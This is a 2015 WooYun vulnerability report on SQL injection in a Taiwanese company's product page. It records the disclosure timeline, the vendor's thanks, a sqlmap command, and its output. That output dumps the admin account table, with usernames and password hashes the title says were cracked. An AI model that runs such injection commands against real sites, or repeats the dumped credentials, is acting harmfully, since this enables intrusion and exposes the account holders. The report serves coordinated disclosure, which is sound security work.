当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162930

漏洞标题:台湾超王科技sql注入(测漏5枚管理员cmd5已解密)(臺灣地區)

相关厂商:超王科技股份有限公司

漏洞作者: 路人甲

提交时间:2015-12-21 12:44

修复时间:2016-02-04 17:47

公开时间:2016-02-04 17:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-23: 厂商已经确认,细节仅向厂商公开
2016-01-02: 细节向核心白帽子及相关领域专家公开
2016-01-12: 细节向普通白帽子公开
2016-01-22: 细节向实习白帽子公开
2016-02-04: 细节向公众公开

简要描述:

详细说明:

http://**.**.**.**/productsDia.php?d=1
报错注入

[14:39:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.44, Apache 2.2.31
back-end DBMS: MySQL 5.0
[14:39:10] [INFO] fetching current user
current user:    'damacom_web@localhost'


<code>available databases [2]:
[*] damacom_web
[*] information_schema


[root@Hacker~]# Sqlmap -u "http://**.**.**.**/productsDia.php?d=1" -D damaco
m_web -T admin_account --dump


| admin  | admin   | {"p1":1,"p2":1,"p3":1,"p4":1,"p5":1,"p6":1,"p7":1,"p8":1,"p
9":1,"p10":1,"p11":1,"p12":1,"p13":1,"p14":1,"p15":1,"p16":1,"p17":1,"p18":1,"p1
9":1,"p97":1,"p98":1,"p99":1,"p100":1,"p101":1,"p102":1,"p103":1,"p104":1,"p105"
:1,"p106":1,"p107":1,"p108":1,"p109":1,"p110":1,"p111":1,"p112":1,"p113":1,"p114
":1,"p115":1,"p116":1,"p117":1} | Y    | design14@**.**.**.** | 1  | NULL | tr
ue      | 2015-09-01 11:15:39 | admin  | <blank> | <blank> | 8733e8c8891ee41b53c
4b10cc6b2dee343a2237e | NULL | NULL    | NULL                | 2015-09-01 10:30:
18 |
| steven | admin   | {"p1":1,"p2":1,"p3":1,"p4":1,"p5":1,"p6":1,"p7":1,"p8":1,"p
9":1,"p10":1,"p11":1,"p12":1,"p13":1,"p14":1,"p15":1,"p16":1,"p17":1,"p18":1,"p9
7":1,"p98":1,"p99":1,"p100":1}
78XUT$%B6D{LD$}Y8`PVERX.png




                                | NULL | <blank>                | 2  | NULL | tr
ue      | 2015-02-13 16:57:06 | steven | <blank> | <blank> | 271e46c78bc27c38e74
87d8635d36a8880dd7400 | NULL | NULL    | 2014-01-17 09:00:41 | 2014-01-20 17:06:
26 |
| Rex    | Rex     | {"p1":1,"p2":1,"p3":1,"p4":1,"p5":1,"p6":1,"p7":1,"p8":1,"p
9":1,"p10":1,"p11":1,"p12":1,"p13":1,"p14":1,"p15":1,"p16":1,"p17":1,"p18":1,"p1
9":1,"p97":1,"p98":1,"p99":1,"p100":1,"p101":1,"p102":1,"p103":1,"p104":1,"p105"
:1,"p106":1,"p107":1,"p108":1,"p109":1,"p110":1,"p111":1,"p112":1,"p113":1,"p114
":1,"p115":1,"p116":1,"p117":1} | NULL | <blank>                | 3  | NULL | tr
ue      | 2015-02-25 14:49:21 | Rex    | <blank> | <blank> | afefc497ee2bcd86530
f2152ffc6af673d2230aa | NULL | NULL    | 2014-01-18 10:32:31 | 2014-05-27 17:21:
39 |
| lingo  | lingo   | {"p1":1,"p2":1,"p3":1,"p4":1,"p5":1,"p6":1,"p7":1,"p8":1,"p
9":1,"p10":1,"p11":1,"p12":1,"p13":1,"p14":1,"p15":1,"p16":1,"p17":1,"p18":1,"p1
9":1,"p97":1,"p98":1,"p99":1,"p100":1,"p101":1,"p102":1,"p103":1,"p104":1,"p105"
:1,"p106":1,"p107":1,"p108":1,"p109":1,"p110":1,"p111":1,"p112":1,"p113":1,"p114
":1,"p115":1,"p116":1,"p117":1} | NULL | <blank>                | 4  | NULL | tr
ue      | 2015-02-25 14:57:30 | lingo  | <blank> | <blank> | fb9acce801701492f7d
83a306666bc87d7b8211f | NULL | NULL    | 2014-01-18 12:01:37 | 2014-10-02 17:07:
31 |
| zara   | lingo   | {"p1":1,"p2":1,"p3":1,"p4":1,"p5":1,"p6":1,"p7":1,"p8":1,"p
9":1,"p10":1,"p11":1,"p12":1,"p13":1,"p14":1,"p15":1,"p16":1,"p17":1,"p18":1,"p1
9":1,"p97":1,"p98":1,"p99":1,"p100":1,"p101":1,"p102":1,"p103":1,"p104":1,"p105"
:1,"p106":1,"p107":1,"p108":1,"p109":1,"p110":1,"p111":1,"p112":1,"p113":1,"p114
":1,"p115":1,"p116":1,"p117":1} | NULL | <blank>                | 5  | NULL | tr
ue      | 2015-02-09 14:11:52 | zara   | <blank> | <blank> | 2b08ff5312315dc2c82
26c5768b81166ba46aaa1 | NULL | NULL    | 2014-10-07 17:56:30 | 2014-10-07 17:56:
30 |
+--------+---------+------------------------------------------------------------
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-23 04:23

厂商回复:

感謝通報

最新状态:

暂无